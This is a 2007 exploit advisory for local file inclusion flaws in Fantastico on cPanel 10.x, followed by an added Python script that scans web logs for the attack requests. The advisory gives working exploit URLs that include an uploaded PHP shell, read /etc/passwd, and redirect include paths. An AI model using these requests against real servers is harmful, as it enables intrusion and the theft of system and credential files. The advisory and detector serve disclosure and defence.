##############################################################
Fantastico in all versions of cPanel 10.x <= Local File Include

##############################################################
Note: the php.ini settings are the cPanel defaults, and they are also
found on all web servers.

A username and password must be provided, with a login on :2082.
To break the strongest protection: mod_security & safe_mode: On &
Disable functions: All NONE



Vulnerable Code ( 1 ) :
if(is_file($userlanguage))
{
    // $userlanguage is passed to include() with no check beyond is_file()
    include ( $userlanguage );
}

In

http://xx.com:2082/frontend/x/fantastico/includes/load_language.php


Exploit 1 :
http://xx.com:2082/frontend/x/fantastico/includes/load_language.php?userlanguage=/home/user/shell.php

id
uid=32170(user) gid=32170(user) groups=32170(user)

Exploit 2 :
http://xx.com:2082/frontend/x/fantastico/includes/load_language.php?userlanguage=/etc/passwd

###################################################
Vulnerable Code ( 2 ) :

$localmysqlconfig=$fantasticopath . "/includes/mysqlconfig.local.php";
if (is_file($localmysqlconfig))
{
    // the include path is built from $fantasticopath
    include($localmysqlconfig);
}

In
http://xx.com:2082/frontend/x/fantastico/includes/mysqlconfig.php
and also in many other files of the program.

Exploit :
First create a directory named (/includes/),
upload Shell.php into (/includes/), then rename it to
mysqlconfig.local.php D:

:::Exploit:::
http://xx.com:2082/frontend/x/fantastico/includes/mysqlconfig.php?fantasticopath=/home/user/
cPanel 10.9.x fantastico Local File Inclusion Vulnerabilities
cyb3rt & 020
03/11/2007

###################################################


Discovered By : cyb3rt & 020
###################################################

Special Greetings :_ Tryag-Team & 4lKaSrGoLd3n-Team
###################################################

# milw0rm.com [2007-03-11]
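
A log check for the two request patterns described above, as an added example that is not part of the original advisory: it flags requests to scripts under fantastico/includes/ that carry userlanguage or fantasticopath in the query string. The Apache-style log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import posixpath
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Variables the advisory shows reaching include(); they are internal to
# Fantastico and have no reason to arrive in a request.
INCLUDE_PARAMS = {"userlanguage", "fantasticopath"}
# Any script in a theme's fantastico/includes/ directory (the advisory notes
# that many files share the second pattern).
SCRIPT_RE = re.compile(r"^/frontend/[^/]+/fantastico/includes/[^/]+\.php$")
# Request field of an Apache-style log line (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines, not taken from a real server.
SAMPLE_LOG = [
    '192.0.2.10 - user [11/Mar/2007:10:00:00 +0000] "GET /frontend/x/fantastico/'
    'includes/load_language.php?userlanguage=%2Fetc%2Fpasswd HTTP/1.1" 200 1532',
    '192.0.2.10 - user [11/Mar/2007:10:00:05 +0000] "GET /frontend/x/fantastico/'
    'includes/mysqlconfig.php?fantasticopath=/home/user/ HTTP/1.1" 200 0',
    '192.0.2.11 - user [11/Mar/2007:10:01:00 +0000] "GET /frontend/x/fantastico/'
    'index.php?lang=en HTTP/1.1" 200 901',
]


def include_overrides(log_line):
    """Return (param, decoded value) pairs that set an include variable."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return []
    target = urlsplit(m.group(1))
    # Decode and normalise so //, ./ and %2F variants of the path still match.
    path = posixpath.normpath(unquote(target.path))
    if not SCRIPT_RE.match(path):
        return []
    # parse_qsl percent-decodes values; POST bodies are not in access logs.
    return [(k, v) for k, v in parse_qsl(target.query, keep_blank_values=True)
            if k in INCLUDE_PARAMS]


def scan(lines):
    """Return (line number, overrides) for every line that needs review."""
    return [(n, hits) for n, line in enumerate(lines, 1)
            if (hits := include_overrides(line))]


if __name__ == "__main__":
    for n, hits in scan(SAMPLE_LOG):
        print(n, hits)
```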